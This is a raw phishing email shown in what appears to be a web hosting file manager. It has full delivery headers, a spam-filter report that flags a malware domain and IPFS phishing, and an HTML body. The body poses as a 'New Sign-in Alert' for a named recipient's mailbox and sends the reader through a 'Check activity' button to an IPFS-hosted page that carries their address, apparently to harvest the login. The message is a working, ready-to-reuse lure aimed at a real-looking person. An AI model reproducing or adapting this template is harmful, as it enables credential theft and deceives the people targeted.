OwlCyberSecurity - MANAGER

Edit File: 1709077039.M301918P3674233.premium128.web-hosting.com,S=8309,W=8446:2,S

Return-Path: <kaya@firemontain.com> Delivered-To: salim.rezki@gourayafroid.com Received: from premium128.web-hosting.com by premium128.web-hosting.com with LMTP id mIEgES9y3mV5EDgAAvhI2g (envelope-from <kaya@firemontain.com>) for <salim.rezki@gourayafroid.com>; Tue, 27 Feb 2024 18:37:19 -0500 Return-path: <kaya@firemontain.com> Envelope-to: salim.rezki@gourayafroid.com Delivery-date: Tue, 27 Feb 2024 18:37:19 -0500 Received: from [107.189.2.123] (port=59739 helo=party.firemontain.com) by premium128.web-hosting.com with esmtps (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.96.1) (envelope-from <kaya@firemontain.com>) id 1rf70b-00FgV2-2z for salim.rezki@gourayafroid.com; Tue, 27 Feb 2024 18:37:19 -0500 DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=dkim; d=firemontain.com; h=From:To:Subject:Date:Message-ID:MIME-Version:Content-Type:Content-Transfer-Encoding; i=kaya@firemontain.com; bh=f2tWC0H7Ns1J4BOpmZDS90mgZTE=; b=K49iv4DbHSQDkdZO4B0cEu53vUnanQngWcbRWC87fuoqrPyQ1lHffBYApNuYqIIqS03ozN8Jn5Uy 4bSmXQ+rx2WUBqCmB4m0jjlT7FFHd3NCobqxJjduBRAknbwL+s1ujVQxn2yvdVgBLKZEamG5S61p cJviFbxUf+FB6TmANnmFkjlreBJZRYYFzd3KN6M3eWNaUJr+jAc7cL1/8hsF8rgLIZscaPQbtk4H onUDnLrggudIq3fa5PYGh8EZ7akxkNLj49QfC37kHPLysN3usA2Q2YMp1U2FFHL8bOi3zvD8hJWR 7hMkC95bb8kzx7+BKhdCkyIWxkEnCIn5Sgonww== DomainKey-Signature: a=rsa-sha1; c=nofws; q=dns; s=dkim; d=firemontain.com; b=g5mZ8at9nA8i7CJYMqeJHxcTVXfGmsOtZxHwjGFkk86YK8pF8PHwKGRVZd3T57gfDoYUNYzkLIsC SX1w7AG8tVyIreYA6yZvRQU/r4Bb0bk/W5mc1nq0ix/2/EhCAtW6ELuQxum8foTsNbVbwE/n/p3x +4M8vV8pZWQIslDQq9OcXtC+lhflWG2yK0tdyQPXAJr+2MXpU4KDHhC7nqmB9n0H2i4dQO7PW7VV vT4ooJZtLFmkzpdDRRhkgDKAGIgUVUtp44SPza99cDd67QgVr2PQp4BwuGng+KOcyeV8r3JunWO6 Bgc1UYsoCMBO6w15l8FHOw5jeD1ersYkN3fXow==; From: "gourayafroid.com@Security Alert" <kaya@firemontain.com> To: salim.rezki@gourayafroid.com Subject: New Sign-in Alert to your salim.rezki@gourayafroid.com Today 2/28/2024 1:36:31 a.m. Date: 28 Feb 2024 01:36:31 +0200 Message-ID: <20240228013631.FC2AD04227171091@firemontain.com> MIME-Version: 1.0 Content-Type: text/html Content-Transfer-Encoding: quoted-printable X-Spam-Status: No, score=4.5 X-Spam-Score: 45 X-Spam-Bar: ++++ X-Ham-Report: Spam detection software, running on the system "premium128.web-hosting.com", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: gourayafroid.com New sign-in to your Email salim.rezki@gourayafroid.com account We noticed a new sign-in to your Email Account on a Windows device. If this was you, you don’t need Content analysis details: (4.5 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- 0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was blocked. See http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. [URIs: gourayafroid.com] 2.5 URIBL_DBL_MALWARE Contains a malware URL listed in the Spamhaus DBL blocklist [URIs: firemontain.com] 0.1 URIBL_CSS_A Contains URL's A record listed in the Spamhaus CSS blocklist [URIs: firemontain.com] -0.0 SPF_PASS SPF: sender matches SPF record 0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts 0.0 HTML_MESSAGE BODY: HTML included in message 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature -0.1 DKIM_VALID_EF Message has a valid DKIM or DK signature from envelope-from domain -0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's domain -0.0 T_SCC_BODY_TEXT_LINE No description available. 0.0 URI_CLOUDFLAREIPFS References Interplanetary File System PtP content via CloudFlare, likely phishing 2.0 RDNS_NONE Delivered to internal network by a host with no rDNS X-Spam-Flag: NO <!DOCTYPE HTML> <html><head><title></title> <meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"> </head> <body style=3D"margin: 0.4em;"> <div align=3D"center" style=3D"padding: 40px 20px; border-radius: 8px; bord= er: thin solid rgb(218, 220, 224); color: rgb(34, 34, 34); text-transform: = none; text-indent: 0px; letter-spacing: normal; font-family: Arial, Helveti= ca, sans-serif; font-size: small; font-style: normal; font-weight: 400; wor= d-spacing: 0px; white-space: normal; orphans: 2; widows: 2; background-colo= r: rgb(255, 255, 255); font-variant-ligatures: normal; font-variant-caps: n= ormal; -webkit-text-stroke-width: 0px;=20 text-decoration-thickness: initial; text-decoration-style: initial; text-de= coration-color: initial;"><div style=3D"line-height: 32px; padding-bottom: = 24px; border-bottom-color: rgb(218, 220, 224); border-bottom-width: thin; b= order-bottom-style: solid;"><div><font size=3D"3"><font color=3D"#1d2228" f= ace=3D"verdana, sans-serif">gourayafroid.com</font><br></font></div><div><f= ont size=3D"3"><font color=3D"#1d2228" face=3D"verdana, sans-serif"><span s= tyle=3D"font-size: 13px;">New sign-in to your Email<span>&nbsp;</span> </span>salim.rezki@gourayafroid.com<span style=3D"font-size: 13px;">&nbsp;a= ccount</span></font></font></div><table align=3D"center" style=3D'color: rg= b(29, 34, 40); line-height: normal; font-size: 13px; margin-top: 8px; borde= r-collapse: collapse; font-feature-settings: "liga" 0;'><tbody><tr style=3D= "line-height: normal;"><td align=3D"right" style=3D"margin: 0px; padding-ri= ght: 8px;"><span style=3D"font-family: verdana, sans-serif;"><br><font size= =3D"3"></font></span></td><td style=3D"margin: 0px;"> <span style=3D"font-family: verdana, sans-serif;"><br><font size=3D"3"></fo= nt></span></td></tr></tbody></table></div><div style=3D"color: rgb(29, 34, = 40); line-height: 20px; padding-top: 20px; font-size: 14px;"><span style=3D= "font-family: verdana, sans-serif;"><font size=3D"3">We noticed a new sign-= in to your Email Account on a Windows device. If this was you, you don&#821= 7;t need<br><br>to do anything. If not, we&#8217;ll help you secure your ac= count.</font></span><div style=3D"padding-top: 32px;"> <a style=3D"padding: 10px 24px; border-radius: 5px; color: rgb(255, 255, 25= 5); line-height: 16px; font-family: verdana, sans-serif; display: inline-bl= ock; min-width: 90px; background-color: rgb(65, 132, 243); text-decoration-= line: none;" href=3D"https://cloudflare-ipfs.com/ipfs/bafybeidis6nkzuwol5dk= 2xacfydts72crvcnerzelvuvubnopuewlmqgna/noth.htm#salim.rezki@gourayafroid.co= m" target=3D"_blank" rel=3D"noopener"><font size=3D"3">Check activity</font= ></a></div></div></div> <div style=3D"color: rgb(34, 34, 34); text-transform: none; text-indent: 0p= x; letter-spacing: normal; font-family: Arial, Helvetica, sans-serif; font-= size: small; font-style: normal; font-weight: 400; word-spacing: 0px; white= -space: normal; orphans: 2; widows: 2; background-color: rgb(255, 255, 255)= ; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-s= troke-width: 0px; text-decoration-thickness: initial; text-decoration-style= : initial; text-decoration-color: initial;"> <div style=3D"text-align: center; line-height: 18px; padding-top: 12px;"><d= iv style=3D"color: rgb(29, 34, 40); font-size: 11px;"><span style=3D"font-f= amily: verdana, sans-serif;"><font size=3D"3">You received this email to le= t you know about important changes to your Email Account and services.</fon= t></span></div><div style=3D"direction: ltr;"><span style=3D"color: rgb(29,= 34, 40); font-family: verdana, sans-serif; font-size: 11px;"><font size=3D= "3"><br>&copy; 2024 Admin&nbsp;</font></span> <font color=3D"#1d2228" face=3D"verdana, sans-serif" size=3D"3">gourayafroi= d.com</font></div></div></div></body></html>